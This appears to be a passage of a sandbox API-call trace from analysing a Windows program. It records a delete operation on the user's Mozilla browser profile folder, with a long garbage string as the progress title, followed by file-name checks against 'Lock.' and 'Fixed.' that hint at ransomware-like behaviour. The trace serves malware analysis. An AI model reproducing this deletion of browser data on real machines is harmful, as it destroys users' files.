lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.146] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0149.146] TranslateMessage (lpMsg=0x8cf968) returned 0 [0149.146] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0149.146] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0149.146] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0149.146] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0149.146] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.146] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0149.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NERYDfycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ERYDfycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RYDfycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YDfycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ycG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cG70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="70.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0149.147] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NERYDfycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ERYDfycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RYDfycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YDfycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ycG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cG70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="70.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.149] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0149.149] 